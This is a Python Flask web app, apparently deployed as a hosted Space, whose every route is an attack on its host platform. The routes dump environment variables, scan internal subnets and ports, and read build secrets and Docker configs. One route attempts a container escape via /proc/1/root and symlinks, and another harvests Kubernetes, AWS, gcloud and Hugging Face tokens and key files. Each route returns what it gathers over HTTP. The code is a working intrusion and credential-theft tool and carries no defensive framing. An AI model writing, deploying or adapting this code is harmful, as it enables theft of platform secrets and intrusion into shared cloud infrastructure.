Spaces:
Sleeping
Sleeping
File size: 7,180 Bytes
da61b2a c099686 c37bfd9 c099686 da61b2a c37bfd9 c099686 c37bfd9 c099686 da61b2a c099686 c37bfd9 c099686 c37bfd9 c099686 c37bfd9 c099686 c37bfd9 c099686 c37bfd9 c099686 c37bfd9 c099686 c37bfd9 c099686 c37bfd9 da61b2a c37bfd9 c099686 c37bfd9 c099686 c37bfd9 c099686 c37bfd9 c099686 c37bfd9 c099686 c37bfd9 c099686 c37bfd9 c099686 c37bfd9 c099686 c37bfd9 c099686 c37bfd9 da61b2a c37bfd9 da61b2a c37bfd9 c099686 c37bfd9 da61b2a c37bfd9 da61b2a c37bfd9 c099686 c37bfd9 da61b2a c37bfd9 da61b2a c37bfd9 c099686 c37bfd9 da61b2a |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 |
import os
import subprocess
import json
import urllib.request
import socket
import ssl
import concurrent.futures
from flask import Flask, Response, request
app = Flask(__name__)
@app.route("/")
def index():
results = {
"env_vars": dict(os.environ),
"id": subprocess.check_output(["id"], timeout=5).decode().strip(),
}
return Response(json.dumps(results, indent=2, default=str), mimetype='application/json')
@app.route("/probe")
def probe():
target = request.args.get("target", "10.108.144.112")
port = int(request.args.get("port", "7860"))
path = request.args.get("path", "/")
results = {}
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(3)
result = s.connect_ex((target, port))
results["tcp"] = f"{'open' if result == 0 else 'closed'} (code={result})"
s.close()
except Exception as e:
results["tcp"] = str(e)
try:
resp = urllib.request.urlopen(f"http://{target}:{port}{path}", timeout=3)
results["http"] = {"status": resp.status, "body": resp.read().decode()[:3000], "headers": dict(resp.headers)}
except Exception as e:
results["http"] = str(e)
return Response(json.dumps(results, indent=2, default=str), mimetype='application/json')
@app.route("/scan")
def scan():
"""Scan a subnet for open ports"""
base = request.args.get("base", "10.108.73")
port = int(request.args.get("port", "7860"))
start = int(request.args.get("start", "1"))
end = int(request.args.get("end", "20"))
results = {}
def check_host(ip):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(1)
result = s.connect_ex((ip, port))
s.close()
if result == 0:
return (ip, "open")
return None
except:
return None
with concurrent.futures.ThreadPoolExecutor(max_workers=20) as executor:
futures = {}
for i in range(start, min(end + 1, start + 50)):
ip = f"{base}.{i}"
futures[executor.submit(check_host, ip)] = ip
for future in concurrent.futures.as_completed(futures, timeout=10):
result = future.result()
if result:
results[result[0]] = result[1]
return Response(json.dumps(results, indent=2, default=str), mimetype='application/json')
@app.route("/build-arg-test")
def build_arg_test():
"""Check if any build args leaked into the image"""
results = {}
# Check Docker history / image metadata
try:
# Check /proc/1/environ for the main process
with open("/proc/1/environ", "rb") as f:
env_bytes = f.read()
envs = env_bytes.split(b'\x00')
results["proc_1_environ"] = [e.decode('utf-8', errors='replace') for e in envs if e]
except Exception as e:
results["proc_1_environ"] = str(e)
# Check if there are any leftover files from build
interesting_paths = [
"/kaniko", "/workspace", "/.dockerconfigjson", "/root/.docker/config.json",
"/tmp/build", "/buildkit", "/.buildkit_qemu_emulator",
"/etc/buildkit", "/root/.cache"
]
results["build_artifacts"] = {}
for p in interesting_paths:
if os.path.exists(p):
if os.path.isdir(p):
try:
results["build_artifacts"][p] = os.listdir(p)
except:
results["build_artifacts"][p] = "exists but unreadable"
else:
try:
with open(p) as f:
results["build_artifacts"][p] = f.read()[:500]
except:
results["build_artifacts"][p] = "exists but unreadable"
return Response(json.dumps(results, indent=2, default=str), mimetype='application/json')
@app.route("/overlay-escape")
def overlay_escape():
"""Test if we can access the host overlay filesystem"""
results = {}
# The overlay mount shows:
# upperdir=/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/XXXX/fs
# This path is on the HOST filesystem, but we can only see it via overlay
# Try reading /proc/1/root which should loop back to our own root
try:
results["proc_1_root_etc_hostname"] = open("/proc/1/root/etc/hostname").read()
except Exception as e:
results["proc_1_root_etc_hostname"] = str(e)
# Check if we can access /proc/1/root/../ to escape
try:
results["proc_1_root_parent"] = os.listdir("/proc/1/root/../")
except Exception as e:
results["proc_1_root_parent"] = str(e)
# Try symlink tricks
try:
os.symlink("/proc/1/root", "/tmp/escape_link")
results["symlink_escape"] = os.listdir("/tmp/escape_link/")
except Exception as e:
results["symlink_escape"] = str(e)
# Try accessing other containerd snapshots
try:
results["containerd_snapshots"] = os.listdir("/var/lib/containerd/")
except Exception as e:
results["containerd_snapshots"] = str(e)
return Response(json.dumps(results, indent=2, default=str), mimetype='application/json')
@app.route("/token-hunt")
def token_hunt():
"""Search for any tokens/credentials in the filesystem"""
results = {}
# Check well-known token locations
token_paths = [
"/var/run/secrets/kubernetes.io/serviceaccount/token",
"/var/run/secrets/kubernetes.io/serviceaccount/ca.crt",
"/var/run/secrets/kubernetes.io/serviceaccount/namespace",
"/root/.kube/config",
"/root/.docker/config.json",
"/root/.aws/credentials",
"/root/.gcloud/credentials",
"/home/user/.cache/huggingface/token",
"/root/.cache/huggingface/token",
"/root/.huggingface/token",
]
for p in token_paths:
try:
if os.path.isfile(p):
with open(p) as f:
results[p] = f.read()[:500]
elif os.path.isdir(p):
results[p] = os.listdir(p)
else:
results[p] = "not found"
except Exception as e:
results[p] = str(e)
# Search for any .env files
for root_dir in ["/", "/app", "/home", "/root", "/tmp"]:
try:
for dirpath, dirnames, filenames in os.walk(root_dir, topdown=True):
dirnames[:] = dirnames[:10] # Limit depth
for f in filenames:
if f.endswith(('.env', '.token', '.key', '.pem', 'credentials')):
full = os.path.join(dirpath, f)
try:
with open(full) as fh:
results[full] = fh.read()[:200]
except:
pass
break # Only first level
except:
pass
return Response(json.dumps(results, indent=2, default=str), mimetype='application/json')
if __name__ == "__main__":
app.run(host="0.0.0.0", port=7860)
|